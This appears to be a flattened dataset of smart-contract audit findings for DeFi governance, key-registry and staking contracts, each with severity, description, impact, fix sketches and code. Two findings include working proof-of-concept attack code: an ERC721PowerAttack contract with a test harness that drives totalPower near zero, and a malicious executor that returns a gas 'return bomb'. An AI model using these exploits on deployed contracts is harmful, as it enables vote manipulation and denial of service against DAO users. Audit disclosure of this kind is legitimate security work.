```\\nfunction createTier(\\n mapping(uint256 => ITokenSaleProposal.Tier) storage tiers,\\n uint256 newTierId,\\n ITokenSaleProposal.TierInitParams memory _tierInitParams\\n ) external {\\n\\n // rest of code.\\n /// @dev return value is not checked intentionally\\n > tierInitParams.saleTokenAddress.call(\\n abi.encodeWithSelector(\\n IERC20.transferFrom.selector,\\n msg.sender,\\n address(this),\\n totalTokenProvided\\n )\\n ); //@audit -> no check if the contract balance has increased proportional to the totalTokenProvided\\n }\\n```\\n
Attacker can at anytime dramatically lower `ERC721Power::totalPower` close to 0
high
Attacker can at anytime dramatically lower `ERC721Power::totalPower` close to 0 using a permission-less attack contract by taking advantage of being able to call `ERC721Power::recalculateNftPower()` & `getNftPower()` for non-existent nfts:\\n```\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit 0 for non-existent tokenId\\n uint256 collateral = nftInfos[tokenId].currentCollateral;\\n\\n // Calculate the minimum possible power based on the collateral of the nft\\n // @audit returns default maxPower for non-existent tokenId\\n uint256 maxNftPower = getMaxPowerForNft(tokenId);\\n uint256 minNftPower = maxNftPower.ratio(collateral, getRequiredCollateralForNft(tokenId));\\n minNftPower = maxNftPower.min(minNftPower);\\n\\n // Get last update and current power. Or set them to default if it is first iteration\\n // @audit both 0 for non-existent tokenId\\n uint64 lastUpdate = nftInfos[tokenId].lastUpdate;\\n uint256 currentPower = nftInfos[tokenId].currentPower;\\n\\n if (lastUpdate == 0) {\\n lastUpdate = powerCalcStartTimestamp;\\n // @audit currentPower set to maxNftPower which\\n // is just the default maxPower even for non-existent tokenId!\\n currentPower = maxNftPower;\\n }\\n\\n // Calculate reduction amount\\n uint256 powerReductionPercent = reductionPercent * (block.timestamp - lastUpdate);\\n uint256 powerReduction = currentPower.min(maxNftPower.percentage(powerReductionPercent));\\n uint256 newPotentialPower = currentPower - powerReduction;\\n\\n // @audit returns newPotentialPower slightly reduced\\n // from maxPower for non-existent tokenId\\n if (minNftPower <= newPotentialPower) {\\n return newPotentialPower;\\n }\\n\\n if (minNftPower <= currentPower) {\\n return minNftPower;\\n }\\n\\n return currentPower;\\n}\\n\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit newPower > 0 for non-existent tokenId\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since\\n // tokenId doesn't exist, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit then totalPower is increased by newPower where:\\n // 0 < newPower < maxPower hence net decrease to totalPower\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n nftInfo.currentPower = newPower;\\n}\\n```\\n
`ERC721Power::recalculateNftPower()` should revert when called for non-existent nfts.
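A minimal sketch of the guard (OpenZeppelin's ERC721 up to v4.x exposes an internal `_exists()`; newer versions would need an `_ownerOf`-based check):\\n```\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n    // Reject non-existent tokens so totalPower cannot be drained\\n    // by recalculating power for ids that were never minted\\n    require(_exists(tokenId), "ERC721Power: recalculation for non-existent token");\\n    // ... rest of the recalculation logic unchanged ...\\n}\\n```\\n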
`ERC721Power::totalPower` lowered to near 0. This can be used to artificially increase voting power since `totalPower` is read when creating the snapshot and is used as the divisor in `GovUserKeeper::getNftsPowerInTokensBySnapshot()`.\\nThis attack is pretty devastating as `ERC721Power::totalPower` can never be increased since the `currentPower` of individual nfts can only ever be decreased; there is no way to "undo" this attack unless the nft contract is replaced with a new contract.\\nProof of Concept: Add attack contract mock/utils/ERC721PowerAttack.sol:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.4;\\n\\nimport "../../gov/ERC721/ERC721Power.sol";\\n\\nimport "hardhat/console.sol";\\n\\ncontract ERC721PowerAttack {\\n // this attack can decrease ERC721Power::totalPower close to 0\\n //\\n // this attack works when block.timestamp > nftPower.powerCalcStartTimestamp\\n // by taking advantage calling recalculateNftPower for non-existent nfts\\n function attack2(\\n address nftPowerAddr,\\n uint256 initialTotalPower,\\n uint256 lastTokenId,\\n uint256 attackIterations\\n ) external {\\n ERC721Power nftPower = ERC721Power(nftPowerAddr);\\n\\n // verify attack starts on the correct block\\n require(\\n block.timestamp > nftPower.powerCalcStartTimestamp(),\\n "ERC721PowerAttack: attack2 requires block.timestamp > nftPower.powerCalcStartTimestamp"\\n );\\n\\n // verify totalPower() correct at starting block\\n require(\\n nftPower.totalPower() == initialTotalPower,\\n "ERC721PowerAttack: incorrect initial totalPower"\\n );\\n\\n // output totalPower before attack\\n console.log(nftPower.totalPower());\\n\\n // keep calling recalculateNftPower() for non-existent nfts\\n // this lowers ERC721Power::totalPower() every time\\n // can't get it to 0 due to underflow but can get close enough\\n for (uint256 i; i < attackIterations; ) {\\n nftPower.recalculateNftPower(++lastTokenId);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // output totalPower after attack\\n console.log(nftPower.totalPower());\\n\\n // original totalPower : 10000000000000000000000000000\\n // current totalPower : 900000000000000000000000000\\n require(\\n nftPower.totalPower() == 900000000000000000000000000,\\n "ERC721PowerAttack: after attack finished totalPower should equal 900000000000000000000000000"\\n );\\n }\\n}\\n```\\n\\nAdd test harness to ERC721Power.test.js:\\n```\\n describe("audit attacker can manipulate ERC721Power totalPower", () => {\\n it("audit attack 2 dramatically lowers ERC721Power totalPower", async () => {\\n // deploy the ERC721Power nft contract with:\\n // max power of each nft = 100\\n // power reduction 10%\\n // required collateral = 100\\n let maxPowerPerNft = toPercent("100");\\n let requiredCollateral = wei("100");\\n let powerCalcStartTime = (await getCurrentBlockTime()) + 1000;\\n\\n // create power nft contract\\n await deployNft(powerCalcStartTime, maxPowerPerNft, toPercent("10"), requiredCollateral);\\n\\n // ERC721Power::totalPower should be zero as no nfts yet created\\n assert.equal((await nft.totalPower()).toFixed(), toPercent("0").times(1).toFixed());\\n\\n // create the attack contract\\n const ERC721PowerAttack = artifacts.require("ERC721PowerAttack");\\n let attackContract = await ERC721PowerAttack.new();\\n\\n // create 10 power nfts for SECOND\\n await nft.safeMint(SECOND, 1);\\n await nft.safeMint(SECOND, 2);\\n await nft.safeMint(SECOND, 3);\\n await nft.safeMint(SECOND, 4);\\n await nft.safeMint(SECOND, 5);\\n await nft.safeMint(SECOND, 6);\\n await 
nft.safeMint(SECOND, 7);\\n await nft.safeMint(SECOND, 8);\\n await nft.safeMint(SECOND, 9);\\n await nft.safeMint(SECOND, 10);\\n\\n // verify ERC721Power::totalPower has been increased by max power for all nfts\\n assert.equal((await nft.totalPower()).toFixed(), maxPowerPerNft.times(10).toFixed());\\n\\n // fast forward time to just after the start of power calculation\\n await setTime(powerCalcStartTime);\\n\\n // launch the attack\\n await attackContract.attack2(nft.address, maxPowerPerNft.times(10).toFixed(), 10, 91);\\n });\\n });\\n```\\n\\nRun attack with: `npx hardhat test --grep "audit attack 2 dramatically lowers ERC721Power totalPower"`
```\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit 0 for non-existent tokenId\\n uint256 collateral = nftInfos[tokenId].currentCollateral;\\n\\n // Calculate the minimum possible power based on the collateral of the nft\\n // @audit returns default maxPower for non-existent tokenId\\n uint256 maxNftPower = getMaxPowerForNft(tokenId);\\n uint256 minNftPower = maxNftPower.ratio(collateral, getRequiredCollateralForNft(tokenId));\\n minNftPower = maxNftPower.min(minNftPower);\\n\\n // Get last update and current power. Or set them to default if it is first iteration\\n // @audit both 0 for non-existent tokenId\\n uint64 lastUpdate = nftInfos[tokenId].lastUpdate;\\n uint256 currentPower = nftInfos[tokenId].currentPower;\\n\\n if (lastUpdate == 0) {\\n lastUpdate = powerCalcStartTimestamp;\\n // @audit currentPower set to maxNftPower which\\n // is just the default maxPower even for non-existent tokenId!\\n currentPower = maxNftPower;\\n }\\n\\n // Calculate reduction amount\\n uint256 powerReductionPercent = reductionPercent * (block.timestamp - lastUpdate);\\n uint256 powerReduction = currentPower.min(maxNftPower.percentage(powerReductionPercent));\\n uint256 newPotentialPower = currentPower - powerReduction;\\n\\n // @audit returns newPotentialPower slightly reduced\\n // from maxPower for non-existent tokenId\\n if (minNftPower <= newPotentialPower) {\\n return newPotentialPower;\\n }\\n\\n if (minNftPower <= currentPower) {\\n return minNftPower;\\n }\\n\\n return currentPower;\\n}\\n\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit newPower > 0 for non-existent tokenId\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since\\n // tokenId doesn't exist, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit then totalPower is increased by newPower where:\\n // 0 < newPower < maxPower hence net decrease to totalPower\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n nftInfo.currentPower = newPower;\\n}\\n```\\n
`GovPool::delegateTreasury` does not verify transfer of tokens and NFTs to delegatee leading to potential voting manipulation
high
`GovPool::delegateTreasury` transfers ERC20 tokens & specific nfts from DAO treasury to `govUserKeeper`. Based on this transfer, the `tokenBalance` and `nftBalance` of the delegatee is increased. This allows a delegatee to use this delegated voting power to vote in critical proposals.\\nAs the following snippet of `GovPool::delegateTreasury` function shows, there is no verification that the tokens and nfts are actually transferred to the `govUserKeeper`. It is implicitly assumed that a successful transfer is completed and subsequently, the voting power of the delegatee is increased.\\n```\\n function delegateTreasury(\\n address delegatee,\\n uint256 amount,\\n uint256[] calldata nftIds\\n ) external override onlyThis {\\n require(amount > 0 || nftIds.length > 0, "Gov: empty delegation");\\n require(getExpertStatus(delegatee), "Gov: delegatee is not an expert");\\n\\n _unlock(delegatee);\\n\\n if (amount != 0) {\\n address token = _govUserKeeper.tokenAddress();\\n\\n > IERC20(token).transfer(address(_govUserKeeper), amount.from18(token.decimals())); //@audit no check if tokens are actually transferred\\n\\n _govUserKeeper.delegateTokensTreasury(delegatee, amount);\\n }\\n\\n if (nftIds.length != 0) {\\n IERC721 nft = IERC721(_govUserKeeper.nftAddress());\\n\\n for (uint256 i; i < nftIds.length; i++) {\\n > nft.safeTransferFrom(address(this), address(_govUserKeeper), nftIds[i]); //-n no check if nft's are actually transferred\\n }\\n\\n _govUserKeeper.delegateNftsTreasury(delegatee, nftIds);\\n }\\n\\n _revoteDelegated(delegatee, VoteType.TreasuryVote);\\n\\n emit DelegatedTreasury(delegatee, amount, nftIds, true);\\n }\\n```\\n\\nThis could lead to a dangerous situation where a malicious DAO treasury can increase voting power manifold while actually transferring tokens only once (or even, not transfer at all). This breaks the invariance that the total accounting balances in `govUserKeeper` contract must match the actual token balances in that contract.
Since DEXE starts out with a trustless assumption that does not give any special trust privileges to a DAO treasury, it is always prudent to follow the "trust but verify" approach when it comes to non-standard tokens, both ERC20 and ERC721. To that extent, consider adding verification of token & nft balance increase before/after token transfer.
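A hedged sketch of the token branch with such a verification (following the pseudocode conventions of the quoted function; the `ERC20(token).decimals()` call and SafeERC20's `safeTransfer` are assumptions):\\n```\\nif (amount != 0) {\\n    address token = _govUserKeeper.tokenAddress();\\n    uint256 transferAmount = amount.from18(ERC20(token).decimals());\\n\\n    uint256 balanceBefore = IERC20(token).balanceOf(address(_govUserKeeper));\\n    IERC20(token).safeTransfer(address(_govUserKeeper), transferAmount);\\n    uint256 balanceAfter = IERC20(token).balanceOf(address(_govUserKeeper));\\n\\n    // Trust but verify: only credit voting power if the keeper's balance\\n    // actually increased by the transferred amount\\n    require(\\n        balanceAfter - balanceBefore == transferAmount,\\n        "Gov: treasury delegation transfer mismatch"\\n    );\\n\\n    _govUserKeeper.delegateTokensTreasury(delegatee, amount);\\n}\\n```\\n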
Since both the ERC20 and ERC721 token implementations are controlled by the DAO, and since we are dealing with upgradeable token contracts, there is a potential rug-pull vector created by the implicit transfer assumption above.
```\\n function delegateTreasury(\\n address delegatee,\\n uint256 amount,\\n uint256[] calldata nftIds\\n ) external override onlyThis {\\n require(amount > 0 || nftIds.length > 0, "Gov: empty delegation");\\n require(getExpertStatus(delegatee), "Gov: delegatee is not an expert");\\n\\n _unlock(delegatee);\\n\\n if (amount != 0) {\\n address token = _govUserKeeper.tokenAddress();\\n\\n > IERC20(token).transfer(address(_govUserKeeper), amount.from18(token.decimals())); //@audit no check if tokens are actually transferred\\n\\n _govUserKeeper.delegateTokensTreasury(delegatee, amount);\\n }\\n\\n if (nftIds.length != 0) {\\n IERC721 nft = IERC721(_govUserKeeper.nftAddress());\\n\\n for (uint256 i; i < nftIds.length; i++) {\\n > nft.safeTransferFrom(address(this), address(_govUserKeeper), nftIds[i]); //-n no check if nft's are actually transferred\\n }\\n\\n _govUserKeeper.delegateNftsTreasury(delegatee, nftIds);\\n }\\n\\n _revoteDelegated(delegatee, VoteType.TreasuryVote);\\n\\n emit DelegatedTreasury(delegatee, amount, nftIds, true);\\n }\\n```\\n
Voting to change `RewardsInfo::voteRewardsCoefficient` has an unintended side-effect of retrospectively changing voting rewards for active proposals
medium
`GovSettings::editSettings` is one of the functions that can be executed via an internal proposal. When this function is called, settings are validated via `GovSettings::_validateProposalSettings`. This function does not check the value of `RewardsInfo::voteRewardsCoefficient` while updating the settings. There is neither a floor nor a cap for this setting.\\nHowever, we've noted that this coefficient amplifies voting rewards as calculated in `GovPoolRewards::_getInitialVotingRewards`, shown below.\\n```\\n function _getInitialVotingRewards(\\n IGovPool.ProposalCore storage core,\\n IGovPool.VoteInfo storage voteInfo\\n ) internal view returns (uint256) {\\n (uint256 coreVotes, uint256 coreRawVotes) = voteInfo.isVoteFor\\n ? (core.votesFor, core.rawVotesFor)\\n : (core.votesAgainst, core.rawVotesAgainst);\\n\\n return\\n coreRawVotes.ratio(core.settings.rewardsInfo.voteRewardsCoefficient, PRECISION).ratio(\\n voteInfo.totalVoted,\\n coreVotes\\n ); //@audit -> initial rewards are calculated proportionate to the vote rewards coefficient\\n }\\n```\\n\\nThis has the unintended side-effect that for the same proposal, different voters can get paid different rewards based on when the reward was claimed. In the extreme case where `core.settings.rewardsInfo.voteRewardsCoefficient` is voted to 0, voters who claimed rewards before the update got paid as promised whereas voters who claimed later got nothing.
Consider freezing `voteRewardsCoefficient` at the time of proposal creation. A prospective update of this setting via internal voting should not change rewards for old proposals.
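A hedged sketch of the snapshot approach (the `voteRewardsCoefficientSnapshot` field is a hypothetical addition to the proposal storage):\\n```\\n// At proposal creation, freeze the live coefficient into the proposal's storage\\ncore.voteRewardsCoefficientSnapshot = core.settings.rewardsInfo.voteRewardsCoefficient;\\n\\n// In GovPoolRewards::_getInitialVotingRewards, read the frozen value so a\\n// later governance update cannot retroactively change rewards:\\nreturn\\n    coreRawVotes.ratio(core.voteRewardsCoefficientSnapshot, PRECISION).ratio(\\n        voteInfo.totalVoted,\\n        coreVotes\\n    );\\n```\\n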
Updating `voteRewardsCoefficient` can lead to unfair reward distribution on old proposals. Since voting rewards for a given proposal are communicated upfront, this could lead to a situation where promised rewards to users are not honoured.\\nProof of Concept: N/A
```\\n function _getInitialVotingRewards(\\n IGovPool.ProposalCore storage core,\\n IGovPool.VoteInfo storage voteInfo\\n ) internal view returns (uint256) {\\n (uint256 coreVotes, uint256 coreRawVotes) = voteInfo.isVoteFor\\n ? (core.votesFor, core.rawVotesFor)\\n : (core.votesAgainst, core.rawVotesAgainst);\\n\\n return\\n coreRawVotes.ratio(core.settings.rewardsInfo.voteRewardsCoefficient, PRECISION).ratio(\\n voteInfo.totalVoted,\\n coreVotes\\n ); //@audit -> initial rewards are calculated proportionate to the vote rewards coefficient\\n }\\n```\\n
Proposal execution can be DOSed with return bombs when calling untrusted execution contracts
medium
`GovPool::execute` does not check for return bombs when executing a low-level call. A return bomb is a large bytes array that expands memory so much that any attempt to execute the transaction leads to an `out-of-gas` exception.\\nThis can create potentially risky outcomes for the DAO. One possible outcome is "single sided" execution, i.e. "actionsFor" can be executed when voting is successful while "actionsAgainst" can be DOSed when voting fails.\\nA clever proposal creator can design a proposal in such a way that only `actionsFor` can be executed and any attempt to execute `actionsAgainst` is permanently DOS'ed (see the PoC contract below).\\nThis is possible because `GovPoolExecute::execute` performs a low-level call on the potentially untrusted `executor` assigned to a specific action.\\n```\\n function execute(\\n mapping(uint256 => IGovPool.Proposal) storage proposals,\\n uint256 proposalId\\n ) external {\\n // rest of code. // code\\n\\n for (uint256 i; i < actionsLength; i++) {\\n> (bool status, bytes memory returnedData) = actions[i].executor.call{\\n value: actions[i].value\\n }(actions[i].data); //@audit returnedData could expand memory and cause out-of-gas exception\\n\\n require(status, returnedData.getRevertMsg());\\n }\\n }\\n```\\n
Consider using `ExcessivelySafeCall` while calling untrusted contracts to avoid return bombs.
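A minimal sketch of a bounded-copy call in inline assembly (written raw to avoid assumptions about any particular library version), copying at most `maxCopy` bytes of returndata so a malicious executor cannot force memory expansion:\\n```\\nfunction _boundedCall(\\n    address target,\\n    uint256 value,\\n    bytes memory data,\\n    uint16 maxCopy\\n) internal returns (bool success, bytes memory ret) {\\n    ret = new bytes(maxCopy);\\n    assembly {\\n        // Perform the call without auto-copying returndata (out = 0, outsize = 0)\\n        success := call(gas(), target, value, add(data, 0x20), mload(data), 0, 0)\\n        // Copy at most maxCopy bytes of whatever was returned\\n        let toCopy := returndatasize()\\n        if gt(toCopy, maxCopy) { toCopy := maxCopy }\\n        mstore(ret, toCopy) // shrink the length field to the copied size\\n        returndatacopy(add(ret, 0x20), 0, toCopy)\\n    }\\n}\\n```\\n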
Voting actions can be manipulated by a creator causing two potential issues:\\nProposal actions can never be executed even after successful voting\\nOne-sided execution where some actions can be executed while others can be DOSed\\nProof of Concept: Consider the following malicious proposal action executor contract. Note that when the proposal passes (isVotesFor = true), the `vote()` function returns empty bytes and when the proposal fails (isVotesFor = false), the same function returns a huge bytes array, effectively causing an "out-of-gas" exception to any caller.\\n```\\ncontract MaliciousProposalActionExecutor is IProposalValidator{\\n\\n function validate(IGovPool.ProposalAction[] calldata actions) external view override returns (bool valid){\\n valid = true;\\n }\\n\\n function vote(\\n uint256 proposalId,\\n bool isVoteFor,\\n uint256 voteAmount,\\n uint256[] calldata voteNftIds\\n ) external returns(bytes memory result){\\n\\n if(isVoteFor){\\n // @audit implement actions for successful vote\\n return ""; // 0 bytes\\n }\\n else{\\n // @audit implement actions for failed vote\\n\\n // Create a large bytes array\\n assembly{\\n revert(0, 1_000_000)\\n }\\n }\\n\\n }\\n}\\n```\\n
```\\n function execute(\\n mapping(uint256 => IGovPool.Proposal) storage proposals,\\n uint256 proposalId\\n ) external {\\n // rest of code. // code\\n\\n for (uint256 i; i < actionsLength; i++) {\\n> (bool status, bytes memory returnedData) = actions[i].executor.call{\\n value: actions[i].value\\n }(actions[i].data); //@audit returnedData could expand memory and cause out-of-gas exception\\n\\n require(status, returnedData.getRevertMsg());\\n }\\n }\\n```\\n
Use low-level `call()` to prevent gas griefing attacks when returned data not required
low
Using `call()` when the returned data is not required unnecessarily exposes the contract to gas griefing attacks via huge returned data payloads. For example:\\n```\\n(bool status, ) = payable(receiver).call{value: amount}("");\\nrequire(status, "Gov: failed to send eth");\\n```\\n\\nIs the same as writing:\\n```\\n(bool status, bytes memory data ) = payable(receiver).call{value: amount}("");\\nrequire(status, "Gov: failed to send eth");\\n```\\n\\nIn both cases the returned data has to be copied into memory, exposing the contract to gas griefing attacks, even though the returned data is not required at all.
Use a low-level call when the returned data is not required, eg:\\n```\\nbool status;\\nassembly {\\n status := call(gas(), receiver, amount, 0, 0, 0, 0)\\n}\\n```\\n\\nConsider using ExcessivelySafeCall.
Contracts unnecessarily expose themselves to gas griefing attacks.
```\\n(bool status, ) = payable(receiver).call{value: amount}("");\\nrequire(status, "Gov: failed to send eth");\\n```\\n
`abi.encodePacked()` should not be used with dynamic types when passing the result to a hash function such as `keccak256()`
low
`abi.encodePacked()` should not be used with dynamic types when passing the result to a hash function such as `keccak256()`.\\nUse `abi.encode()` instead, which pads items to 32 bytes and thereby prevents hash collisions (e.g. `abi.encodePacked(0x123,0x456)` => `0x123456` => `abi.encodePacked(0x1,0x23456)`, but `abi.encode(0x123,0x456)` => 0x0...1230...456).\\nUnless there is a compelling reason, `abi.encode` should be preferred. If there is only one argument to `abi.encodePacked()` it can often be cast to `bytes()` or `bytes32()` instead. If all arguments are strings and/or bytes, `bytes.concat()` should be used instead.\\nProof of Concept:\\n```\\nFile: factory/PoolFactory.sol\\n\\n return keccak256(abi.encodePacked(deployer, poolName));\\n```\\n\\n```\\nFile: libs/gov/gov-pool/GovPoolOffchain.sol\\n\\n return keccak256(abi.encodePacked(resultsHash, block.chainid, address(this)));\\n```\\n\\n```\\nFile: user/UserRegistry.sol\\n\\n _signatureHashes[_documentHash][msg.sender] = keccak256(abi.encodePacked(signature));\\n```\\n
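A small self-contained demonstration of the collision and the fix:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.4;\\n\\ncontract EncodeCollisionDemo {\\n    function collide() external pure returns (bool packedCollides, bool encodeCollides) {\\n        // encodePacked concatenates dynamic types with no separators,\\n        // so ("foo", "bar1") and ("foob", "ar1") pack to the same bytes...\\n        packedCollides =\\n            keccak256(abi.encodePacked("foo", "bar1")) ==\\n            keccak256(abi.encodePacked("foob", "ar1")); // true\\n        // ...while abi.encode length-prefixes and pads each argument,\\n        // so the hashes differ\\n        encodeCollides =\\n            keccak256(abi.encode("foo", "bar1")) ==\\n            keccak256(abi.encode("foob", "ar1")); // false\\n    }\\n}\\n```\\n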
See description.
null
```\\nFile: factory/PoolFactory.sol\\n\\n return keccak256(abi.encodePacked(deployer, poolName));\\n```\\n
A removal signature might be applied to the wrong `fid`.
medium
A remove signature is used to remove a key from `fidOwner` using `KeyRegistry.removeFor()`. The signature is verified in `_verifyRemoveSig()`.\\n```\\n function _verifyRemoveSig(address fidOwner, bytes memory key, uint256 deadline, bytes memory sig) internal {\\n _verifySig(\\n _hashTypedDataV4(\\n keccak256(abi.encode(REMOVE_TYPEHASH, fidOwner, keccak256(key), _useNonce(fidOwner), deadline))\\n ),\\n fidOwner,\\n deadline,\\n sig\\n );\\n }\\n```\\n\\nBut the signature doesn't specify the `fid` the key is being removed from, so the scenario below is possible:\\nAlice is the owner of `fid1` and she created a removal signature to remove a `key`, but it has not been used yet.\\nFor various reasons, she becomes the owner of `fid2`.\\n`fid2` also has a `key`, but she doesn't want to remove it.\\nIf anyone calls `removeFor()` with her previous signature, the `key` will be removed from `fid2` unexpectedly.\\nOnce a key is removed, its `KeyState` changes to `REMOVED` and no one, including the owner, can restore it.
The removal signature should contain `fid` also to be invalidated for another `fid`.
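A hedged sketch of binding the signature to a specific fid (the typehash string and parameter layout are illustrative assumptions):\\n```\\n// Hypothetical typehash that commits to the fid the key is removed from\\nbytes32 internal constant REMOVE_TYPEHASH = keccak256(\\n    "Remove(address owner,uint256 fid,bytes key,uint256 nonce,uint256 deadline)"\\n);\\n\\nfunction _verifyRemoveSig(\\n    address fidOwner,\\n    uint256 fid,\\n    bytes memory key,\\n    uint256 deadline,\\n    bytes memory sig\\n) internal {\\n    _verifySig(\\n        _hashTypedDataV4(\\n            keccak256(\\n                abi.encode(REMOVE_TYPEHASH, fidOwner, fid, keccak256(key), _useNonce(fidOwner), deadline)\\n            )\\n        ),\\n        fidOwner,\\n        deadline,\\n        sig\\n    );\\n}\\n```\\n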
A key remove signature might be used for an unexpected `fid`.
```\\n function _verifyRemoveSig(address fidOwner, bytes memory key, uint256 deadline, bytes memory sig) internal {\\n _verifySig(\\n _hashTypedDataV4(\\n keccak256(abi.encode(REMOVE_TYPEHASH, fidOwner, keccak256(key), _useNonce(fidOwner), deadline))\\n ),\\n fidOwner,\\n deadline,\\n sig\\n );\\n }\\n```\\n
`VoteKickPolicy._endVote()` might revert forever due to underflow
high
In `onFlag()`, `targetStakeAtRiskWei[target]` might be less than the total rewards for the flagger/reviewers due to rounding.\\n```\\nFile: contracts\\OperatorTokenomics\\StreamrConfig.sol\\n /**\\n * Minimum amount to pay reviewers+flagger\\n * That is: minimumStakeWei >= (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) / slashingFraction\\n */\\n function minimumStakeWei() public view returns (uint) {\\n return (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) * 1 ether / slashingFraction;\\n }\\n```\\n\\nLet's assume `flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei = 100, StreamrConfig.slashingFraction = 0.03e18 (3%), minimumStakeWei() = 100 * 1e18 / 0.03e18 = 10000 / 3 = 3333.`\\nIf we suppose `stakedWei[target] = streamrConfig.minimumStakeWei()`, then `targetStakeAtRiskWei[target]` = 3333 * 0.03e18 / 1e18 = 99.99, which truncates to 99.\\nAs a result, `targetStakeAtRiskWei[target]` is less than the total rewards (=100), and `_endVote()` will revert during the reward distribution due to underflow.\\nThe above scenario is only possible when there is rounding in the `minimumStakeWei` calculation, so it works properly with the default `slashingFraction = 10%`.
Always round the `minimumStakeWei()` up.
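A minimal sketch of the rounded-up computation, using the variables from the quoted function:\\n```\\nfunction minimumStakeWei() public view returns (uint) {\\n    uint totalRewardsWei = flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei;\\n    // Ceiling division guarantees\\n    //   minimumStakeWei * slashingFraction / 1 ether >= totalRewardsWei\\n    // so targetStakeAtRiskWei can always cover the flagger/reviewer rewards\\n    return (totalRewardsWei * 1 ether + slashingFraction - 1) / slashingFraction;\\n}\\n```\\n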
The `VoteKickPolicy` wouldn't work as expected and malicious operators won't be kicked forever.
```\\nFile: contracts\\OperatorTokenomics\\StreamrConfig.sol\\n /**\\n * Minimum amount to pay reviewers+flagger\\n * That is: minimumStakeWei >= (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) / slashingFraction\\n */\\n function minimumStakeWei() public view returns (uint) {\\n return (flaggerRewardWei + flagReviewerCount * flagReviewerRewardWei) * 1 ether / slashingFraction;\\n }\\n```\\n
Possible overflow in `_payOutFirstInQueue`
high
In `_payOutFirstInQueue()`, a revert is possible during `operatorTokenToDataInverse()`.\\n```\\nuint amountOperatorTokens = moduleCall(address(exchangeRatePolicy), abi.encodeWithSelector(exchangeRatePolicy.operatorTokenToDataInverse.selector, amountDataWei));\\n```\\n\\nIf a delegator calls `undelegate()` with `type(uint256).max`, `operatorTokenToDataInverse()` will revert due to uint overflow and the queue logic will be broken forever.\\n```\\n function operatorTokenToDataInverse(uint dataWei) external view returns (uint operatorTokenWei) {\\n return dataWei * this.totalSupply() / valueWithoutEarnings();\\n }\\n```\\n
We should cap `amountDataWei` before calling `operatorTokenToDataInverse()`.
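A hedged sketch of one possible cap before the module call (assuming `valueWithoutEarnings()`, which already appears in the exchange-rate formula, bounds any sensible payout):\\n```\\n// Cap the requested DATA amount so operatorTokenToDataInverse() cannot\\n// overflow on a type(uint256).max undelegation request\\nuint256 maxPayoutDataWei = valueWithoutEarnings();\\nif (amountDataWei > maxPayoutDataWei) {\\n    amountDataWei = maxPayoutDataWei;\\n}\\nuint256 amountOperatorTokens = moduleCall(\\n    address(exchangeRatePolicy),\\n    abi.encodeWithSelector(exchangeRatePolicy.operatorTokenToDataInverse.selector, amountDataWei)\\n);\\n```\\n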
The queue logic will be broken forever because `_payOutFirstInQueue()` keeps reverting.
```\\nuint amountOperatorTokens = moduleCall(address(exchangeRatePolicy), abi.encodeWithSelector(exchangeRatePolicy.operatorTokenToDataInverse.selector, amountDataWei));\\n```\\n
Wrong validation in `DefaultUndelegationPolicy.onUndelegate()`
high
`onUndelegate()` checks whether the operator owner still holds at least `minimumSelfDelegationFraction` of the total supply.\\n```\\n function onUndelegate(address delegator, uint amount) external {\\n // limitation only applies to the operator, others can always undelegate\\n if (delegator != owner) { return; }\\n\\n uint actualAmount = amount < balanceOf(owner) ? amount : balanceOf(owner); //@audit amount:DATA, balanceOf:Operator\\n uint balanceAfter = balanceOf(owner) - actualAmount;\\n uint totalSupplyAfter = totalSupply() - actualAmount;\\n require(1 ether * balanceAfter >= totalSupplyAfter * streamrConfig.minimumSelfDelegationFraction(), "error_selfDelegationTooLow");\\n }\\n```\\n\\nBut `amount` is denominated in DATA tokens while `balanceOf(owner)` is an `Operator` token balance, so the two cannot be compared directly.
`onUndelegate()` should compare amounts after converting to the same token.
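A hedged sketch of the comparison after converting the DATA `amount` into Operator tokens (`dataToOperatorTokens` is a hypothetical helper standing in for the contract's exchange-rate conversion):\\n```\\nfunction onUndelegate(address delegator, uint amount) external {\\n    // limitation only applies to the operator, others can always undelegate\\n    if (delegator != owner) { return; }\\n\\n    // `amount` is denominated in DATA; convert it to Operator tokens before\\n    // comparing against balanceOf(owner), which is an Operator-token balance\\n    uint amountOperatorTokens = dataToOperatorTokens(amount); // hypothetical helper\\n    uint actualAmount = amountOperatorTokens < balanceOf(owner) ? amountOperatorTokens : balanceOf(owner);\\n    uint balanceAfter = balanceOf(owner) - actualAmount;\\n    uint totalSupplyAfter = totalSupply() - actualAmount;\\n    require(\\n        1 ether * balanceAfter >= totalSupplyAfter * streamrConfig.minimumSelfDelegationFraction(),\\n        "error_selfDelegationTooLow"\\n    );\\n}\\n```\\n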
The operator owner wouldn't be able to undelegate because `onUndelegate()` works unexpectedly.
